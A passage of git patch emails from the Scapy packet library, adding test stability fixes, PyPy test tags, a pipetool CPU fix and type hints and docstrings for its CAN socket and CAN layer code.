sendp(Ether(dst="ff:ff:ff:ff:ff:ff")/IP(dst="192.0.2.2")/ICMP(seq=(1,3)), iface="tap0") -time.sleep(1) -t.stop() +t = AsyncSniffer(opened_socket=tap0, lfilter=lambda x: ICMP in x, started_callback=cb, count=3) +t.start() +t.join(timeout=3) assert len(t.results) >= 3 icmp4_sequences = set() @@ -245,6 +242,12 @@ assert len(icmp4_sequences) == 3, ( = Delete the tap interface tap0.close() -if not conf.use_pypy: - # See https://pypy.readthedocs.io/en/latest/cpython_differences.html - del tap0 + ++ Refresh interfaces +~ linux tun tap not_libpcap + += Cleanup + +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() From a5eaece15f3acdbb24e44b1fa6ed6d5a4785d13f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 29 Apr 2021 09:20:16 +0200 Subject: [PATCH 0567/1632] Trying to improve isotp.uts stability (#3192) --- test/contrib/isotp.uts | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 5d82605a8a7..3a307e8c7b4 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1442,14 +1442,19 @@ with new_can_socket0() as isocan, \ ISOTPSoftSocket(isocan, 0x123, 0x321) as sock: msg.data += b'0' sock.send(msg) + time.sleep(0.1) msg.data += b'1' sock.send(msg) + time.sleep(0.1) msg.data += b'2' sock.send(msg) + time.sleep(0.1) msg.data += b'3' sock.send(msg) + time.sleep(0.1) msg.data += b'4' sock.send(msg) + time.sleep(0.1) rxThread.join(timeout=5) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') @@ -2002,7 +2007,7 @@ with ISOTPNativeSocket(iface0, sid=0x641, did=0x241) as s: = ISOTP Socket sr1 test exit_if_no_isotp_module() -txSock = ISOTPNativeSocket(iface0, sid=0x123, did=0x321) +txSock = ISOTPNativeSocket(iface0, sid=0x123, did=0x321, basecls=ISOTP) txmsg = ISOTP(b'\x11\x22\x33') rx2 = None @@ -2036,8 +2041,8 @@ assert(rx2.answers(txmsg)) = ISOTP Socket sr1 and ISOTP test exit_if_no_isotp_module() -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321) -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123) +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') rx2 = None @@ -2067,8 +2072,8 @@ assert(rx2 == msg) = ISOTP Socket sr1 and ISOTP test vice versa exit_if_no_isotp_module() -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123) -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321) +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') @@ -2098,8 +2103,8 @@ assert(sent) = ISOTP Socket sniff exit_if_no_isotp_module() -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123) -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321) +rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) +txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) succ = False receiver_up = Event() From 4b8d3182e1b898197792f44adbecda3294f50891 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 29 Apr 2021 09:23:03 +0200 Subject: [PATCH 0568/1632] Disable some automotive tests on PyPy (#3195) --- test/contrib/automotive/ccp.uts | 3 +-- test/contrib/automotive/ecu_am.uts | 1 + test/contrib/automotive/gm/gmlanutils.uts | 2 -- test/contrib/automotive/obd/scanner.uts | 2 +- test/contrib/automotive/uds_utils.uts | 2 +- test/contrib/automotive/xcp/xcp_comm.uts | 1 + 6 files changed, 5 insertions(+), 6 deletions(-) diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index 873103b985a..e02cb7d35ba 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -880,6 +880,7 @@ assert dto.ccp_reserved == b"\xff" * 3 assert dto.hashret() == cro.hashret() + Tests on a virtual CAN-Bus +~ not_pypy = CAN Socket sr1 with dto.ansers(cro) == True @@ -954,8 +955,6 @@ assert hasattr(dto, "load") == False assert dto.MTA0_extension == 0xff assert dto.MTA0_address == 0xffffffff -+ Cleanup - = Delete vcan interfaces assert cleanup_interfaces() diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index c8fa94630e6..e191901cbed 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,4 +1,5 @@ % Regression tests for EcuAnsweringMachine +~ not_pypy + Configuration ~ conf diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 4f84ee6962a..1032a7ba35e 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,6 +1,4 @@ % Regression tests for gmlanutil -~ needs_root - ~ not_pypy needs_root + Configuration diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index fc810522edd..79202056bd0 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -1,5 +1,5 @@ % Regression tests for obd_scan -~ needs_root +~ needs_root not_pypy + Configuration ~ conf diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 42c301bf87c..34b5b6588c6 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -1,5 +1,5 @@ % Regression tests for uds_utils -~ needs_root +~ needs_root not_pypy + Configuration ~ conf diff --git a/test/contrib/automotive/xcp/xcp_comm.uts b/test/contrib/automotive/xcp/xcp_comm.uts index 7794ec34e56..f29a9cf2c5e 100644 --- a/test/contrib/automotive/xcp/xcp_comm.uts +++ b/test/contrib/automotive/xcp/xcp_comm.uts @@ -1,4 +1,5 @@ % Regression tests for the XCP using CANSockets +~ not_pypy # More information at http://www.secdev.org/projects/UTscapy/ ############ From db698d2ddebb1a0b3fa53247117f0fb6ef9950bc Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 29 Apr 2021 09:51:33 +0200 Subject: [PATCH 0569/1632] Fix 100% CPU with Pipetools #3197 (#3198) --- scapy/pipetool.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/pipetool.py b/scapy/pipetool.py index aa49c46ff72..89fe7bae03e 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -108,7 +108,7 @@ def run(self): RUN = True STOP_IF_EXHAUSTED = False while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1): - fds = select_objects(sources, 0) + fds = select_objects(sources, 2) for fd in fds: if fd is self: cmd = self._read_cmd() From 8a8a918a32102f7ce7724b77ccfeaeaf315b20f4 Mon Sep 17 00:00:00 2001 From: "David H. Gutteridge" Date: Tue, 27 Apr 2021 20:49:27 -0400 Subject: [PATCH 0570/1632] Ensure command line arguments are passed through run_tests --- test/run_tests | 2 ++ 1 file changed, 2 insertions(+) diff --git a/test/run_tests b/test/run_tests index 1b747d5b1b8..ab892d89135 100755 --- a/test/run_tests +++ b/test/run_tests @@ -27,6 +27,8 @@ then esac done PYTHON=${PYTHON:-python3} +else + ARGS="$@" fi $PYTHON --version > /dev/null 2>&1 if [ ! $? -eq 0 ] From 4cf55740a8e91b7f88f36362ed11968fc4d0f671 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 4 May 2021 00:26:49 +0200 Subject: [PATCH 0571/1632] Automotive documentation and Typing [ready] (#3075) --- .config/mypy/mypy_enabled.txt | 22 ++-- doc/scapy/conf.py | 3 + scapy/contrib/automotive/xcp/xcp.py | 2 +- scapy/contrib/cansocket.py | 14 +- scapy/contrib/cansocket_native.py | 80 +++++++----- scapy/contrib/cansocket_python_can.py | 178 +++++++++++++++++++++----- scapy/layers/can.py | 162 +++++++++++++++++++---- scapy/supersocket.py | 2 +- test/contrib/cansocket.uts | 2 +- test/contrib/cansocket_native.uts | 23 +++- test/contrib/cansocket_python_can.uts | 2 +- test/scapy/layers/can.uts | 7 +- tox.ini | 2 +- 13 files changed, 380 insertions(+), 119 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index a89f783f21f..ab12e606b19 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -39,18 +39,20 @@ scapy/layers/l2.py # CONTRIB #scapy/contrib/http2.py # needs to be fixed -scapy/contrib/roce.py -scapy/contrib/automotive/scanner/test_case.py -scapy/contrib/automotive/scanner/staged_test_case.py +scapy/contrib/automotive/bmw/hsfz.py +scapy/contrib/automotive/doip.py +scapy/contrib/automotive/ecu.py +scapy/contrib/automotive/gm/gmlan_ecu_states.py +scapy/contrib/automotive/gm/gmlan_logging.py +scapy/contrib/automotive/gm/gmlanutils.py +scapy/contrib/automotive/kwp.py scapy/contrib/automotive/scanner/configuration.py scapy/contrib/automotive/scanner/graph.py -scapy/contrib/automotive/ecu.py +scapy/contrib/automotive/scanner/staged_test_case.py +scapy/contrib/automotive/scanner/test_case.py scapy/contrib/automotive/uds_ecu_states.py scapy/contrib/automotive/uds_logging.py -scapy/contrib/automotive/gm/gmlanutils.py -scapy/contrib/automotive/gm/gmlan_ecu_states.py -scapy/contrib/automotive/gm/gmlan_logging.py -scapy/contrib/automotive/bmw/hsfz.py -scapy/contrib/automotive/doip.py +scapy/contrib/cansocket_native.py +scapy/contrib/cansocket_python_can.py scapy/contrib/isotp.py -scapy/contrib/automotive/kwp.py +scapy/contrib/roce.py diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 33c4615ba8d..8f5b90d9a6a 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -100,6 +100,9 @@ # Enable codeauthor and sectionauthor directives show_authors = True +# Mock python-can +autodoc_mock_imports = ["can"] + # -- Options for HTML output ---------------------------------------------- diff --git a/scapy/contrib/automotive/xcp/xcp.py b/scapy/contrib/automotive/xcp/xcp.py index 3dfbc5ce256..3457424e1b1 100644 --- a/scapy/contrib/automotive/xcp/xcp.py +++ b/scapy/contrib/automotive/xcp/xcp.py @@ -96,7 +96,7 @@ def post_build(self, pkt, pay): return super(XCPOnCAN, self).post_build(pkt, pay) def extract_padding(self, p): - return p, None + return p[:self.length], None class XCPOnUDP(UDP): diff --git a/scapy/contrib/cansocket.py b/scapy/contrib/cansocket.py index ae86760e1a7..1bc38939fc1 100644 --- a/scapy/contrib/cansocket.py +++ b/scapy/contrib/cansocket.py @@ -21,8 +21,6 @@ if conf.contribs['CANSocket']['use-python-can']: from can import BusABC as can_BusABC # noqa: F401 PYTHON_CAN = True - else: - PYTHON_CAN = False except ImportError: log_loading.info("Can't import python-can.") except KeyError: @@ -30,18 +28,12 @@ if PYTHON_CAN: - log_loading.info("Using python-can CANSocket.") - log_loading.info("Specify 'conf.contribs['CANSocket'] = " - "{'use-python-can': False}' to enable native CANSockets.") + log_loading.info("Using python-can CANSockets.\nSpecify 'conf.contribs['CANSocket'] = {'use-python-can': False}' to enable native CANSockets.") # noqa: E501 from scapy.contrib.cansocket_python_can import (PythonCANSocket, CANSocket) # noqa: E501 F401 elif LINUX and six.PY3 and not conf.use_pypy: - log_loading.info("Using native CANSocket.") - log_loading.info("Specify 'conf.contribs['CANSocket'] = " - "{'use-python-can': True}' " - "to enable python-can CANSockets.") + log_loading.info("Using native CANSockets.\nSpecify 'conf.contribs['CANSocket'] = {'use-python-can': True}' to enable python-can CANSockets.") # noqa: E501 from scapy.contrib.cansocket_native import (NativeCANSocket, CANSocket) # noqa: E501 F401 else: - log_loading.info("No CAN support available. Install python-can or " - "use Linux and python3.") + log_loading.info("No CAN support available. Install python-can or use Linux and python3.") # noqa: E501 diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 704a624c15a..6f8cc25494e 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -13,30 +13,50 @@ import struct import socket import time + from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception, warning +from scapy.packet import Packet from scapy.layers.can import CAN, CAN_MTU -from scapy.packet import Padding from scapy.arch.linux import get_last_packet_timestamp +from scapy.compat import List, Dict, Type, Any, Optional, Tuple, raw conf.contribs['NativeCANSocket'] = {'channel': "can0"} class NativeCANSocket(SuperSocket): + """Initializes a Linux PF_CAN socket object. + + Example: + >>> socket = NativeCANSocket(channel="vcan0", can_filters=[{'can_id': 0x200, 'can_mask': 0x7FF}]) + + :param channel: Network interface name + :param receive_own_messages: Messages, sent by this socket are will + also be received. + :param can_filters: A list of can filter dictionaries. + :param basecls: Packet type in which received data gets interpreted. + :param kwargs: Various keyword arguments for compatibility with + PythonCANSockets + """ # noqa: E501 desc = "read/write packets at a given CAN interface using PF_CAN sockets" - def __init__(self, channel=None, receive_own_messages=False, - can_filters=None, remove_padding=True, basecls=CAN, **kwargs): - bustype = kwargs.pop("bustype", None) - if bustype and bustype != "socketcan": + def __init__(self, + channel=None, # type: Optional[str] + receive_own_messages=False, # type: bool + can_filters=None, # type: Optional[List[Dict[str, int]]] + basecls=CAN, # type: Type[Packet] + **kwargs # type: Dict[str, Any] + ): + # type: (...) -> None + bustype = kwargs.pop("bustype", "") + if bustype != "socketcan": warning("You created a NativeCANSocket. " "If you're providing the argument 'bustype', please use " "the correct one to achieve compatibility with python-can" "/PythonCANSocket. \n'bustype=socketcan'") self.basecls = basecls - self.remove_padding = remove_padding self.channel = conf.contribs['NativeCANSocket']['channel'] if \ channel is None else channel self.ins = socket.socket(socket.PF_CAN, @@ -70,50 +90,42 @@ def __init__(self, channel=None, receive_own_messages=False, self.ins.bind((self.channel,)) self.outs = self.ins - def recv(self, x=CAN_MTU): + def recv_raw(self, x=CAN_MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Returns a tuple containing (cls, pkt_data, time)""" + pkt = None try: - pkt, sa_ll = self.ins.recvfrom(x) + pkt = self.ins.recv(x) except BlockingIOError: # noqa: F821 warning("Captured no data, socket in non-blocking mode.") - return None except socket.timeout: warning("Captured no data, socket read timed out.") - return None except OSError: # something bad happened (e.g. the interface went down) warning("Captured no data.") - return None # need to change the byte order of the first four bytes, # required by the underlying Linux SocketCAN frame format - if not conf.contribs['CAN']['swap-bytes']: + if not conf.contribs['CAN']['swap-bytes'] and pkt is not None: pkt = struct.pack("I12s", pkt)) - len = pkt[4] - canpkt = self.basecls(pkt[:len + 8]) - canpkt.time = get_last_packet_timestamp(self.ins) - if self.remove_padding: - return canpkt - else: - return canpkt / Padding(pkt[len + 8:]) + return self.basecls, pkt, get_last_packet_timestamp(self.ins) def send(self, x): + # type: (Packet) -> int try: - if hasattr(x, "sent_time"): - x.sent_time = time.time() - - # need to change the byte order of the first four bytes, - # required by the underlying Linux SocketCAN frame format - bs = bytes(x) - if not conf.contribs['CAN']['swap-bytes']: - bs = bs + b'\x00' * (CAN_MTU - len(bs)) - bs = struct.pack("I12s", bs)) - return SuperSocket.send(self, bs) - except socket.error as msg: - raise msg - - def close(self): - self.ins.close() + x.sent_time = time.time() + except AttributeError: + pass + + # need to change the byte order of the first four bytes, + # required by the underlying Linux SocketCAN frame format + bs = raw(x) + if not conf.contribs['CAN']['swap-bytes']: + bs = bs + b'\x00' * (CAN_MTU - len(bs)) + bs = struct.pack("I12s", bs)) + + return super(NativeCANSocket, self).send(bs) # type: ignore CANSocket = NativeCANSocket diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 936d39cfd37..abb38f57481 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -3,7 +3,7 @@ # Copyright (C) Nils Weiss # This program is published under a GPLv2 license -# scapy.contrib.description = Python-Can CANSocket +# scapy.contrib.description = python-can CANSocket # scapy.contrib.status = loads """ @@ -20,14 +20,18 @@ from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.layers.can import CAN +from scapy.packet import Packet from scapy.error import warning +from scapy.compat import List, Type, Tuple, Dict, Any, Optional, cast from scapy.modules.six.moves import queue -from scapy.compat import Any, List + from can import Message as can_Message from can import CanError as can_CanError from can import BusABC as can_BusABC from can.interface import Bus as can_Bus +__all__ = ["CANSocket", "PythonCANSocket"] + class PriotizedCanMessage(object): """Helper object for comparison of CAN messages. If the timestamps of two @@ -70,12 +74,26 @@ def __ge__(self, other): class SocketMapper: + """Internal Helper class to map a python-can bus object to + a list of SocketWrapper instances + """ def __init__(self, bus, sockets): # type: (can_BusABC, List[SocketWrapper]) -> None + """Initializes the SocketMapper helper class + + :param bus: A python-can Bus object + :param sockets: A list of SocketWrapper objects which want to receive + messages from the provided python-can Bus object. + """ self.bus = bus self.sockets = sockets def mux(self): + # type: () -> None + """Multiplexer function. Tries to receive from its python-can bus + object. If a message is received, this message gets forwarded to + all receive queues of the SocketWrapper objects. + """ while True: prio_count = 0 try: @@ -90,17 +108,31 @@ def mux(self): warning("[MUX] python-can exception caught: %s" % e) -class SocketsPool(object): - __instance = None - - def __new__(cls): - if SocketsPool.__instance is None: - SocketsPool.__instance = object.__new__(cls) - SocketsPool.__instance.pool = dict() - SocketsPool.__instance.pool_mutex = threading.Lock() - return SocketsPool.__instance +class _SocketsPool(object): + """Helper class to organize all SocketWrapper and SocketMapper objects""" + def __init__(self): + # type: () -> None + self.pool = dict() # type: Dict[str, SocketMapper] + self.pool_mutex = threading.Lock() def internal_send(self, sender, msg, prio=0): + # type: (SocketWrapper, can_Message, int) -> None + """Internal send function. + + A given SocketWrapper wants to send a CAN message. The python-can + Bus object is obtained from an internal pool of SocketMapper objects. + The given message is sent on the python-can Bus object and also + inserted into the message queues of all other SocketWrapper objects + which are connected to the same python-can bus object + by the SocketMapper. + + :param sender: SocketWrapper which initiated a send of a CAN message + :param msg: CAN message to be sent + :param prio: Priority count for internal heapq + """ + if sender.name is None: + raise TypeError("SocketWrapper.name should never be None") + with self.pool_mutex: try: mapper = self.pool[sender.name] @@ -118,15 +150,30 @@ def internal_send(self, sender, msg, prio=0): warning("[SND] python-can exception caught: %s" % e) def multiplex_rx_packets(self): + # type: () -> None + """This calls the mux() function of all SocketMapper + objects in this SocketPool + """ with self.pool_mutex: for _, t in self.pool.items(): t.mux() def register(self, socket, *args, **kwargs): - k = str( - str(kwargs.get("bustype", "unknown_bustype")) + "_" + + # type: (SocketWrapper, Tuple[Any, ...], Dict[str, Any]) -> None + """Registers a SocketWrapper object. Every SocketWrapper describes to + a python-can bus object. This python-can bus object can only exist + once. In case this object already exists in this SocketsPool, organized + by a SocketMapper object, the new SocketWrapper is inserted in the + list of subscribers of the SocketMapper. Otherwise a new python-can + Bus object is created from the provided args and kwargs and inserted, + encapsulated in a SocketMapper, into this SocketsPool. + + :param socket: SocketWrapper object which needs to be registered. + :param args: Arguments for the python-can Bus object + :param kwargs: Keyword arguments for the python-can Bus object + """ + k = str(kwargs.get("bustype", "unknown_bustype")) + "_" + \ str(kwargs.get("channel", "unknown_channel")) - ) with self.pool_mutex: if k in self.pool: t = self.pool[k] @@ -142,6 +189,17 @@ def register(self, socket, *args, **kwargs): self.pool[k] = SocketMapper(bus, [socket]) def unregister(self, socket): + # type: (SocketWrapper) -> None + """Unregisters a SocketWrapper from its subscription to a SocketMapper. + + If a SocketMapper doesn't have any subscribers, the python-can Bus + get shutdown. + + :param socket: SocketWrapper to be unregistered + """ + if socket.name is None: + raise TypeError("SocketWrapper.name should never be None") + with self.pool_mutex: try: t = self.pool[socket.name] @@ -153,19 +211,39 @@ def unregister(self, socket): warning("Socket %s already removed from pool" % socket.name) +SocketsPool = _SocketsPool() + + class SocketWrapper(can_BusABC): - """Socket for specific Bus or Interface. - """ + """Helper class to wrap a python-can Bus object as socket""" def __init__(self, *args, **kwargs): + # type: (Tuple[Any, ...], Dict[str, Any]) -> None + """Initializes a new python-can based socket, described by the provided + arguments and keyword arguments. This SocketWrapper gets automatically + registered in the SocketsPool. + + :param args: Arguments for the python-can Bus object + :param kwargs: Keyword arguments for the python-can Bus object + """ super(SocketWrapper, self).__init__(*args, **kwargs) self.rx_queue = queue.PriorityQueue() # type: queue.PriorityQueue[PriotizedCanMessage] # noqa: E501 - self.name = None + self.name = None # type: Optional[str] self.prio_counter = 0 - SocketsPool().register(self, *args, **kwargs) + SocketsPool.register(self, *args, **kwargs) def _recv_internal(self, timeout): - SocketsPool().multiplex_rx_packets() + # type: (int) -> Tuple[Optional[can_Message], bool] + """Internal blocking receive method, + following the ``can_BusABC`` interface of python-can. + + This triggers the multiplex function of the general SocketsPool. + + :param timeout: Time to wait for a packet + :return: Returns a tuple of either a can_Message or None and a bool to + indicate if filtering was already applied. + """ + SocketsPool.multiplex_rx_packets() try: pm = self.rx_queue.get(block=True, timeout=timeout) return pm.msg, True @@ -173,24 +251,52 @@ def _recv_internal(self, timeout): return None, True def send(self, msg, timeout=None): + # type: (can_Message, Optional[int]) -> None + """Send function, following the ``can_BusABC`` interface of python-can. + + :param msg: Message to be sent. + :param timeout: Not used. + """ self.prio_counter += 1 - SocketsPool().internal_send(self, msg, self.prio_counter) + SocketsPool.internal_send(self, msg, self.prio_counter) def shutdown(self): - SocketsPool().unregister(self) + # type: () -> None + """Shutdown function, following the ``can_BusABC`` interface of + python-can. + """ + SocketsPool.unregister(self) class PythonCANSocket(SuperSocket): + """Initializes a python-can bus object as Scapy PythonCANSocket. + + All provided keyword arguments, except *basecls* are forwarded to + the python-can can_Bus init function. For further details on python-can + check: https://python-can.readthedocs.io/ + + Example: + >>> socket = PythonCANSocket(bustype='socketcan', channel='vcan0', bitrate=250000) + """ # noqa: E501 desc = "read/write packets at a given CAN interface " \ "using a python-can bus object" nonblocking_socket = True def __init__(self, **kwargs): - self.basecls = kwargs.pop("basecls", CAN) - self.iface = SocketWrapper(**kwargs) + # type: (Dict[str, Any]) -> None + + self.basecls = None # type: Optional[Type[Packet]] + try: + self.basecls = cast(Type[Packet], kwargs.pop("basecls")) + except KeyError: + self.basecls = CAN + + self.can_iface = SocketWrapper(**kwargs) def recv_raw(self, x=0xffff): - msg = self.iface.recv() + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Returns a tuple containing (cls, pkt_data, time)""" + msg = self.can_iface.recv() hdr = msg.is_extended_id << 31 | msg.is_remote_frame << 30 | \ msg.is_error_frame << 29 | msg.arbitration_id @@ -203,6 +309,7 @@ def recv_raw(self, x=0xffff): return self.basecls, pkt_data, msg.timestamp def send(self, x): + # type: (Packet) -> int msg = can_Message(is_remote_frame=x.flags == 0x2, is_extended_id=x.flags == 0x4, is_error_frame=x.flags == 0x1, @@ -211,22 +318,33 @@ def send(self, x): data=bytes(x)[8:]) msg.timestamp = time.time() try: - x.sent_time = time.time() + x.sent_time = msg.timestamp except AttributeError: pass - self.iface.send(msg) + self.can_iface.send(msg) + return len(x) @staticmethod - def select(sockets, *args, **kwargs): - SocketsPool().multiplex_rx_packets() + def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + """This function is called during sendrecv() routine to select + the available sockets. + + :param sockets: an array of sockets that need to be selected + :returns: an array of sockets that were selected and + the function to be called next to get the packets (i.g. recv) + """ + SocketsPool.multiplex_rx_packets() return [s for s in sockets if isinstance(s, PythonCANSocket) and - not s.iface.rx_queue.empty()] + not s.can_iface.rx_queue.empty()] def close(self): + # type: () -> None + """Closes this socket""" if self.closed: return super(PythonCANSocket, self).close() - self.iface.shutdown() + self.can_iface.shutdown() CANSocket = PythonCANSocket diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 6b19c57d0e2..85fb55f4d39 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -43,14 +43,44 @@ CAN_MAX_DLEN = 8 CAN_INV_FILTER = 0x20000000 -# Mimics the Wireshark CAN dissector parameter 'Byte-swap the CAN ID/flags field' # noqa: E501 -# set to True when working with PF_CAN sockets -conf.contribs['CAN'] = {'swap-bytes': False} +# Mimics the Wireshark CAN dissector parameter +# 'Byte-swap the CAN ID/flags field'. +# Set to True when working with PF_CAN sockets +conf.contribs['CAN'] = {'swap-bytes': False, + 'remove-padding': True} class CAN(Packet): - """A minimal implementation of the CANopen protocol, based on - Wireshark dissectors. See https://wiki.wireshark.org/CANopen + """A implementation of CAN messages. + + Dissection of CAN messages from Wireshark captures and Linux PF_CAN sockets + are supported from protocol specification. + See https://wiki.wireshark.org/CANopen for further information on + the Wireshark dissector. Linux PF_CAN and Wireshark use different + endianness for the first 32 bit of a CAN message. This dissector can be + configured for both use cases. + + Configuration ``swap-bytes``: + Wireshark dissection: + >>> conf.contribs['CAN']['swap-bytes'] = False + + PF_CAN Socket dissection: + >>> conf.contribs['CAN']['swap-bytes'] = True + + Configuration ``remove-padding``: + Linux PF_CAN Sockets always return 16 bytes per CAN frame receive. + This implicates that CAN frames get padded from the Linux PF_CAN socket + with zeros up to 8 bytes of data. The real length from the CAN frame on + the wire is given by the length field. To obtain only the CAN frame from + the wire, this additional padding has to be removed. Nevertheless, for + corner cases, it might be useful to also get the padding. This can be + configuered through the **remove-padding** configuration. + + Truncate CAN frame based on length field: + >>> conf.contribs['CAN']['remove-padding'] = True + + Show entire CAN frame received from socket: + >>> conf.contribs['CAN']['remove-padding'] = False """ fields_desc = [ @@ -66,13 +96,13 @@ class CAN(Packet): @staticmethod def inv_endianness(pkt): # type: (bytes) -> bytes - """ Invert the order of the first four bytes of a CAN packet + """Invert the order of the first four bytes of a CAN packet This method is meant to be used specifically to convert a CAN packet - between the pcap format and the socketCAN format + between the pcap format and the SocketCAN format - :param pkt: str of the CAN packet - :return: packet str with the first four bytes swapped + :param pkt: bytes str of the CAN packet + :return: bytes str with the first four bytes swapped """ len_partial = len(pkt) - 4 # len of the packet, CAN ID excluded return struct.pack(' bytes - """ Implements the swap-bytes functionality when dissecting """ + """Implements the swap-bytes functionality when dissecting """ if conf.contribs['CAN']['swap-bytes']: data = CAN.inv_endianness(s) # type: bytes return data @@ -93,9 +123,9 @@ def post_dissect(self, s): def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes - """ Implements the swap-bytes functionality when building + """Implements the swap-bytes functionality for Packet build. - this is based on a copy of the Packet.self_build default method. + This is based on a copy of the Packet.self_build default method. The goal is to affect only the CAN layer data and keep under layers (e.g LinuxCooked) unchanged """ @@ -106,7 +136,10 @@ def post_build(self, pkt, pay): def extract_padding(self, p): # type: (bytes) -> Tuple[bytes, Optional[bytes]] - return b'', p + if conf.contribs['CAN']['remove-padding']: + return b'', None + else: + return b'', p conf.l2types.register(DLT_CAN_SOCKETCAN, CAN) @@ -114,6 +147,16 @@ def extract_padding(self, p): class SignalField(ScalingField): + """SignalField is a base class for signal data, usually transmitted from + CAN messages in automotive applications. Most vehicle manufacturers + describe their vehicle internal signals by so called data base CAN (DBC) + files. All necessary functions to easily create Scapy dissectors similar + to signal descriptions from DBC files are provided by this base class. + + SignalField instances should only be used together with SignalPacket + classes since SignalPackets enforce length checks for CAN messages. + + """ __slots__ = ["start", "size"] def __init__(self, name, default, start, size, scaling=1, unit="", @@ -326,6 +369,14 @@ def __init__(self, name, default, start, scaling=1, unit="", class SignalPacket(Packet): + """Special implementation of Packet. + + This class enforces the correct wirelen of a CAN message for + signal transmitting in automotive applications. + Furthermore, the dissection order of SignalFields in fields_desc is + deduced by the start index of a field. + """ + def pre_dissect(self, s): # type: (bytes) -> bytes if not all(isinstance(f, SignalField) or @@ -337,7 +388,8 @@ def pre_dissect(self, s): def post_dissect(self, s): # type: (bytes) -> bytes - """ SignalFields can be dissected on packets with unordered fields. + """SignalFields can be dissected on packets with unordered fields. + The order of SignalFields is defined from the start parameter. After a build, the consumed bytes of the length of all SignalFields have to be removed from the SignalPacket. @@ -350,6 +402,25 @@ def post_dissect(self, s): class SignalHeader(CAN): + """Special implementation of a CAN Packet to allow dynamic binding. + + This class can be provided to CANSockets as basecls. + + Example: + >>> class floatSignals(SignalPacket): + >>> fields_desc = [ + >>> LEFloatSignalField("floatSignal2", default=0, start=32), + >>> BEFloatSignalField("floatSignal1", default=0, start=7)] + >>> + >>> bind_layers(SignalHeader, floatSignals, identifier=0x321) + >>> + >>> dbc_sock = CANSocket("can0", basecls=SignalHeader) + + All CAN messages received from this dbc_sock CANSocket will be interpreted + as SignalHeader. Through Scapys ``bind_layers`` mechanism, all CAN messages + with CAN identifier 0x321 will interpret the payload bytes of these + CAN messages as floatSignals packet. + """ fields_desc = [ FlagsField('flags', 0, 3, ['error', 'remote_transmission_request', @@ -366,18 +437,29 @@ def extract_padding(self, s): def rdcandump(filename, count=-1, interface=None): # type: (str, int, Optional[str]) -> PacketList - """Read a candump log file and return a packet list + """ Read a candump log file and return a packet list. - filename: file to read - count: read only packets - interfaces: return only packets from a specified interface + :param filename: Filename of the file to read from. + Also gzip files are accepted. + :param count: Read only packets. Specify -1 to read all packets. + :param interface: Return only packets from a specified interface + :return: A PacketList object containing the read files """ with CandumpReader(filename, interface) as fdesc: return fdesc.read_all(count=count) class CandumpReader: - """A stateful candump reader. Each packet is returned as a CAN packet""" + """A stateful candump 